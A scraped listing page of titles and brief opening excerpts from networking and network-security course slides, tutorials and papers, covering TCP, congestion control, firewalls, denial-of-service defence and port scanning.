More informationDefending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial
Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial Paper by Rocky K C Chang, The Hong Kong Polytechnic University Published in the October 2002 issue of IEEE Communications
More informationOur Narrow Focus Computer Networking Security Vulnerabilities. IP-level vulnerabilities
Our Narrow Focus 15-441 15-441 Computer Networking 15-641 Lecture 22 Security: DOS Peter Steenkiste Fall 2014 www.cs.cmu.edu/~prs/15-441-f14 Yes: Creating a secure channel for communication (Part I) Protecting
More informationNetwork Attacks. CS Computer Security Profs. Vern Paxson & David Wagner
Network Attacks CS 161 - Computer Security Profs. Vern Paxson & David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/
More informationComputer Networks. Transmission Control Protocol. Jianping Pan Spring /3/17 CSC361 1
Computer Networks Transmission Control Protocol Jianping Pan Spring 2017 2/3/17 CSC361 1 https://connex.csc.uvic.ca/portal NSERC USRA awards available at UVic CSc for 2017/18 2/3/17 CSC361 2 TCP Transmission
More informationCSC 4900 Computer Networks: TCP
CSC 4900 Computer Networks: TCP Professor Henry Carter Fall 2017 Project 2: mymusic You will be building an application that allows you to synchronize your music across machines. The details of which are
More informationConfiguring Flood Protection
Configuring Flood Protection NOTE: Control Plane flood protection is located on the Firewall Settings > Advanced Settings page. TIP: You must click Accept to activate any settings you select. The Firewall
More informationNetwork Security. Evil ICMP, Careless TCP & Boring Security Analyses. Mohamed Sabt Univ Rennes, CNRS, IRISA Thursday, October 4th, 2018
Network Security Evil ICMP, Careless TCP & Boring Security Analyses Mohamed Sabt Univ Rennes, CNRS, IRISA Thursday, October 4th, 2018 Part I Internet Control Message Protocol (ICMP) Why ICMP No method
More informationSun Mgt Bonus Lab 2: Zone and DoS Protection on Palo Alto Networks Firewalls 1
Sun Mgt Bonus Lab 2: Zone and DoS Protection on Palo Alto Networks Firewalls 1 Overview Denial of Service (DoS) and Distributed Denial of Service (DDoS) types of attack are attempts to disrupt network
More informationFirewalls and NAT. Firewalls. firewall isolates organization s internal net from larger Internet, allowing some packets to pass, blocking others.
Firews and NAT 1 Firews By conventional definition, a firew is a partition made of fireproof material designed to prevent the spread of fire from one part of a building to another. firew isolates organization
More information8. TCP Congestion Control
8. TCP Congestion Control 1 TCP Congestion Control Slow-start increase Multiplicative decrease Congestion avoidance Measurement of variation Exponential timer backoff 2002 Yanghee Choi 2 Congestion Control
More informationCS457 Transport Protocols. CS 457 Fall 2014
CS457 Transport Protocols CS 457 Fall 2014 Topics Principles underlying transport-layer services Demultiplexing Detecting corruption Reliable delivery Flow control Transport-layer protocols User Datagram
More informationYAF A Case Study in Flow Meter Design
YAF A Case Study in Flow Meter Design presented at FloCon 2008 - Savannah, Georgia Brian Trammell Technical Lead, Engineering CERT Network Situational Awareness YAF Open-source, IPFIX-compliant bidirectional
More informationStatic Detection of Packet Injection Vulnerabilities A Case for Identifying Attacker-controlled Implicit Information Leaks
Static Detection of Packet Injection Vulnerabilities A Case for Identifying Attacker-controlled Implicit Information Leaks Qi Alfred Chen, Zhiyun Qian, Yunhan Jack Jia, Yuru Shao, Z. Morley Mao University
More informationDENIAL OF SERVICE ATTACKS
DENIAL OF SERVICE ATTACKS Ezell Frazier EIS 4316 November 6, 2016 Contents 7.1 Denial of Service... 2 7.2 Targets of DoS attacks... 2 7.3 Purpose of flood attacks... 2 7.4 Packets used during flood attacks...
More informationThe Transport Layer: TCP & Reliable Data Transfer
The Transport Layer: TCP & Reliable Data Transfer Smith College, CSC 249 February 15, 2018 1 Chapter 3: Transport Layer q TCP Transport layer services: v Multiplexing/demultiplexing v Connection management
More informationAuthors. Passive Data Link Layer Wireless Device Driver Fingerprinting. Agenda OVERVIEW. Problems. Device Drivers
Passive Data Link Layer 802.11 Wireless Device Driver Fingerprinting Presenter: Tyler Sidell April 2, 2008 Authors Jason Franklin, Carnegie Mellon Damon McCoy, University of Colorado Paria Tabriz, University
More informationFlashback.. Internet design goals. Security Part One: Attacks and Countermeasures. Why did they leave it out? Security Vulnerabilities
Flashback.. Internet design goals Security Part One: Attacks and Countermeasures 15-441 With slides from: Debabrata Dash,Nick Feamster, Vyas Sekar 15-411: F08 security 1 1. Interconnection 2. Failure resilience
More informationDenial of Service (DoS)
Flood Denial of Service (DoS) Comp Sci 3600 Security Outline Flood 1 2 3 4 5 Flood 6 7 8 Denial-of-Service (DoS) Attack Flood The NIST Computer Security Incident Handling Guide defines a DoS attack as:
More informationNT1210 Introduction to Networking. Unit 10
NT1210 Introduction to Networking Unit 10 Chapter 10, TCP/IP Transport Objectives Identify the major needs and stakeholders for computer networks and network applications. Compare and contrast the OSI
More informationHello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud
Hello from the Other Side: SSH over Robust Cache Covert Channels in the Cloud Clémentine Maurice, Manuel Weber, Michael Schwarz, Lukas Giner, Daniel Gruss, Carlo Alberto Boano, Stefan Mangard, Kay Römer
More informationTransmission Control Protocol. ITS 413 Internet Technologies and Applications
Transmission Control Protocol ITS 413 Internet Technologies and Applications Contents Overview of TCP (Review) TCP and Congestion Control The Causes of Congestion Approaches to Congestion Control TCP Congestion
More informationNetwork Research and Linux at the Hamilton Institute, NUIM.
Network Research and Linux at the Hamilton Institute, NUIM. David Malone 4 November 26 1 What has TCP ever done for Us? Demuxes applications (using port numbers). Makes sure lost data is retransmitted.
More informationECE 435 Network Engineering Lecture 10
ECE 435 Network Engineering Lecture 10 Vince Weaver http://web.eece.maine.edu/~vweaver vincent.weaver@maine.edu 28 September 2017 Announcements HW#4 was due HW#5 will be posted. midterm/fall break You
More informationRAPTOR: Routing Attacks on Privacy in Tor. Yixin Sun. Princeton University. Acknowledgment for Slides. Joint work with
RAPTOR: Routing Attacks on Privacy in Tor Yixin Sun Princeton University Joint work with Annie Edmundson, Laurent Vanbever, Oscar Li, Jennifer Rexford, Mung Chiang, Prateek Mittal Acknowledgment for Slides
More informationLecture 8. TCP/IP Transport Layer (2)
Lecture 8 TCP/IP Transport Layer (2) Outline (Transport Layer) Principles behind transport layer services: multiplexing/demultiplexing principles of reliable data transfer learn about transport layer protocols
More informationINF5290 Ethical Hacking. Lecture 3: Network reconnaissance, port scanning. Universitetet i Oslo Laszlo Erdödi
INF5290 Ethical Hacking Lecture 3: Network reconnaissance, port scanning Universitetet i Oslo Laszlo Erdödi Lecture Overview Identifying hosts in a network Identifying services on a host What are the typical
More informationECE 358 Project 3 Encapsulation and Network Utilities
ECE 358 Project 3 Encapsulation and Network Utilities Objective: After this project, students are expected to: i. Understand the format of standard frames and packet headers. ii. Use basic network utilities
More informationCS670: Network security
Cristina Nita-Rotaru CS670: Network security ARP, TCP 1: Background on network protocols OSI/ISO Model Application Presentation Session Transport Network Data Link Physical Layer Application Presentation
More informationNetwork Security Issues, Part 1
Network Security Issues, Part 1 EE 122 - Networking Prof. Vern Paxson November 18, 2013 Game Plan Two network security lectures Today: threats at different Internet layers Next Monday: building secure
More informationCMPE 150/L : Introduction to Computer Networks. Chen Qian Computer Engineering UCSC Baskin Engineering Lecture 10
CMPE 150/L : Introduction to Computer Networks Chen Qian Computer Engineering UCSC Baskin Engineering Lecture 10 1 Midterm exam Midterm next Thursday Close book but one-side 8.5"x11" note is allowed (must
More information